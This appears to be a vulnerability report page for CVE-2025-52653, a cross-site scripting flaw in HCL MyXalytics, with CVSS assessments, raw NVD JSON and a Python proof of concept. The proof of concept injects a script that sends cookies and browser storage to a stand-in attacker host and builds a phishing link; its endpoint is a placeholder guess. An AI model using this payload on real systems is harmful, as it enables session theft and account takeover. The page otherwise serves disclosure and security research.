Security Vulnerability Report
CVE-2025-52653 CVSS 7.6 HIGH

CVE-2025-52653

Published: 2025-10-03 18:15:36
Last Modified: 2025-10-08 16:50:59

Description

The HCL MyXalytics product is affected by a cross-site scripting vulnerability in its web application. This can allow the execution of unauthorized scripts, potentially resulting in unauthorized actions or access.

Weakness: CWE-79 (Improper Neutralization of Input During Web Page Generation, i.e. cross-site scripting)

CVSS Details

CVSS Score
7.6
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:H

Note: the score above is the assessment NVD records as "Secondary" for this CVE. NVD's own "Primary" assessment scores it 5.4 MEDIUM with vector CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N (scope changed, low confidentiality and integrity impact, no availability impact). Both assessments agree that the attacker needs low privileges (PR:L) and that a victim must interact (UI:R), which is the usual profile for an XSS issue; the two differ on impact, so prioritize according to which assessment your organization uses.

Configurations (Affected Products)

cpe:2.3:a:hcltech:dryice_myxalytics:6.6:*:*:*:*:*:*:* - VULNERABLE
HCL MyXalytics (for the exact affected versions, refer to HCL's official security advisory KB0124411)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-52653 - HCL MyXalytics XSS PoC
# Vulnerability: Reflected/Stored Cross-Site Scripting in HCL MyXalytics
# CVSS: 7.6 (HIGH)
import requests

TARGET_URL = "https://target-myxalytics.example.com"
LOGIN_URL = f"{TARGET_URL}/api/auth/login"
INJECTION_ENDPOINT = f"{TARGET_URL}/api/search"  # Example endpoint, replace with actual vulnerable endpoint

# Step 1: Authenticate with low-privilege credentials (PR:L)
session = requests.Session()
credentials = {
    "username": "attacker_user",
    "password": "attacker_password",
}
session.post(LOGIN_URL, json=credentials)

# Step 2: Craft malicious XSS payload
# The payload attempts to steal session cookies and exfiltrate to attacker server
xss_payload = """
<script>
fetch('https://attacker.example.com/steal', {
    method: 'POST',
    mode: 'no-cors',
    body: JSON.stringify({
        cookies: document.cookie,
        url: window.location.href,
        localStorage: JSON.stringify(localStorage),
        sessionStorage: JSON.stringify(sessionStorage)
    })
});
</script>
"""

# Step 3: Inject payload into vulnerable parameter
# The injection point could be a search field, comment, profile field, etc.
injection_params = {
    "q": xss_payload,  # 'q' is example parameter name
    "filter": "all",
    "page": "1",
}
response = session.get(INJECTION_ENDPOINT, params=injection_params)

# Step 4: Verify injection success
if xss_payload in response.text:
    print("[+] XSS payload successfully injected into the response")
    print("[+] When an admin or other user visits this URL, the script will execute")
    # Craft a phishing URL to send to the victim
    phishing_url = response.url
    print(f"[+] Phishing URL: {phishing_url}")
else:
    print("[-] Injection may have failed or payload is filtered")

# Alternative: Direct URL-based reflected XSS payload
direct_xss_url = f"{INJECTION_ENDPOINT}?q=<script>alert(document.cookie)</script>"
print(f"\n[+] Direct reflected XSS URL: {direct_xss_url}")
```

References

https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0124411 (Vendor Advisory, HCL KB0124411)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-52653",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-03T18:15:35.697",
    "lastModified": "2025-10-08T16:50:59.213",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "HCL MyXalytics product is affected by Cross Site Scripting vulnerability in the web application. This can allow the execution of unauthorized scripts, potentially resulting in unauthorized actions or access."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:H",
            "baseScore": 7.6,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "LOW",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.1,
          "impactScore": 5.5
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
            "baseScore": 5.4,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.3,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-79"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:hcltech:dryice_myxalytics:6.6:*:*:*:*:*:*:*",
                "matchCriteriaId": "63206848-DCF7-4835-A58C-5F3E7F455E5C"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0124411",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      }
    ]
  }
}
```